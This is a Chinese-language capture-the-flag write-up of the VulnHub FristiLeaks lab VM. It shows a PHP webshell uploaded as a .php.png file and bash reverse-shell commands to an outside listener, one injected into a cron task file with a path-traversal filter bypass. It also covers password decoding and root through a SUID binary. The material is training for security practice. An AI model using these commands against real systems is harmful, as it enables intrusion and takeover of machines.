VulnHub – FristiLeaks

环境下载地址:https://www.vulnhub.com/entry/fristileaks-13,133/

环境配置

这里我使用的是Oracle VM VirtualBox,选择导入虚拟电脑,导入进去启动就可以。

进入正题

web应用

发现80端口开着web服务,查看web服务

查看源代码可以发现

1
Goal: get UID 0 (root) and read the special flag file.

这个暂时用不到,扫一波目录看一下

在robots.txt看到

访问发现并没有得到什么hint。

继续访问images目录

根据图片提示尝试访问:http://192.168.0.125/fristi/

尝试弱口令无果,查看源代码

1
2
3
4
5
6
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->

这是被eezeepz留下的。

继续往下看

显然这段base64编码的有问题,删掉换行之后解base64


原来是个图片,解base64存为个图片
1
2
3
4
5
import base64
body = raw_input("input:")
file_new = open("flag.png",'wb')
file_new.write(base64.b64decode(body))
file_new.close()

这个应该是个密码:keKkeKKeKKeKkEkkEk

使用

1
username:eezeepz&password=keKkeKKeKKeKkEkkEk

登录。

尝试上传个php文件回显

1
2
Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded

试试存不存在解析漏洞,上传yijuhua.php.png,里面是个一句话。访问之


可以知道已经解析了,菜刀链接。

1
2
[/var/www/html/fristi/uploads/]$ whoami
apache

只有一个低权限用户

权限提升

先用菜刀的虚拟终端反弹个shell出来方便操作

1
bash -i >& /dev/tcp/192.168.0.106/7777 0>&1

本地nc监听一下

先用菜刀浏览一下看看有什么重要信息

然后访问home目录发现有admin/firstigod/eezeepz。

1
2
3
4
5
6
7
8
bash-4.1$ ls -la
ls -la
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 2015 .
dr-xr-xr-x. 22 root root 4096 Feb 9 05:04 ..
drwx------. 2 admin admin 4096 Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod

访问eezeepz目录发现notes.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry

发现了这个hint,这里说runthis将会几分钟以admin用户执行一次,但是命令是有限制的,这里我尝试让它去反弹回来一个admin用户权限的shell。

1
2
bash-4.1$ echo "bash -i >& /dev/tcp/192.168.0.106/9999 0>&1" > /tmp/runthis
echo "bash -i >& /dev/tcp/192.168.0.106/9999 0>&1" > /tmp/runthis

几分钟后

1
2
3
bash-4.1$ cat cronresult
cat cronresult
command did not start with /home/admin or /usr/bin

更改再次,通过目录跳跃来绕过限制

1
2
bash-4.1$ echo "/usr/bin/../../../bin/bash -i >& /dev/tcp/192.168.0.106/9999 0>&1" > /tmp/runthis
1" > /tmp/runthis/../../bin/bash -i >& /dev/tcp/192.168.0.106/9999 0>&

拿到admin用户的shell。

1
2
3
4
5
6
7
8
9
10
11
[admin@localhost ~]$ cat cryptpass.py
cat cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
1
2
3
[admin@localhost ~]$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
1
2
3
[admin@localhost ~]$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

这里有一个加密脚本,两个密文,写解密脚本解密,脚本如下

1
2
3
4
5
6
7
8
9
10
11
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
def decodeString(str):
stt = codecs.encode(str[::-1], 'rot13')
return base64.b64decode(stt)
#cryptoResult=encodeString(sys.argv[1])
cryptoResult=decodeString(sys.argv[1])
print cryptoResult

1
2
3
4
5
6
7
C:\Users\12517\Desktop
λ python test.py mVGZ3O3omkJLmy2pcuTq
thisisalsopw123
C:\Users\12517\Desktop
λ python test.py =RFn0AKnlMHMPIzpyuTI0ITG
LetThereBeFristi!

拿到两个密码。

1
2
3
[admin@localhost ~]$ su fristigod
su fristigod
standard in must be a tty

网上找找可以找到跟 su 命令的实现有关; B环境上su的实现应该是判断标准输入是不是tty ; 而A环境上su的实现则允许从其他文件读取密码。方法如下

1
python -c 'import pty; pty.spawn("/bin/sh")'

1
2
3
4
5
6
7
8
9
10
11
12
13
[admin@localhost ~]$ python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import pty; pty.spawn("/bin/sh")'
sh-4.1$ ls
ls
cat cronjob.py cryptpass.py echo grep whoisyourgodnow.txt
chmod cryptedpass.txt df egrep ps
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod
1
2
3
4
5
6
7
8
9
10
bash-4.1$ pwd
pwd
/var/fristigod
bash-4.1$ ls -la
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .
drwxr-xr-x. 19 root root 4096 Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff

在.secret_admin_stuff文件里发现了doCom的文件

1
-rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom

然后回头看一下history

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
bash-4.1$ cat .bash_history
cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
less /var/log/secure e
Fexit
exit
exit

这里很明显可以利用SUID来提权,还是查询一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
bash-4.1$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/bin/ping
/bin/ping6
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
/usr/bin/crontab
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/passwd
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/usr/sbin/suexec
/usr/sbin/usernetctl
/var/fristigod/.secret_admin_stuff/doCom

执行.bash_history里面的命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
bash-4.1$ sudo -u fristi ./doCom id
sudo -u fristi ./doCom id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
bash-4.1$ sudo -u fristi ./doCom ls /
sudo -u fristi ./doCom ls /
bin dev home lib64 media opt root selinux sys usr
boot etc lib lost+found mnt proc sbin srv tmp var
bash-4.1$ sudo -u fristi ./doCom ls /root
sudo -u fristi ./doCom ls /root
fristileaks_secrets.txt
bash-4.1$ sudo -u fristi ./doCom cat /root/fristileaks_secrets.txt
sudo -u fristi ./doCom cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1

也可以

1
2
bash-4.1$ sudo -u fristi ./doCom bash -i >& /dev/tcp/192.168.0.106/6666 0>&1
sudo -u fristi ./doCom bash -i >& /dev/tcp/192.168.0.106/6666 0>&1

1
2
3
4
5
6
7
λ nc -lvnp 6666
listening on [any] 6666 ...
connect to [192.168.0.106] from (UNKNOWN) [192.168.0.125] 44788
bash-4.1# whoami
whoami
root
bash-4.1#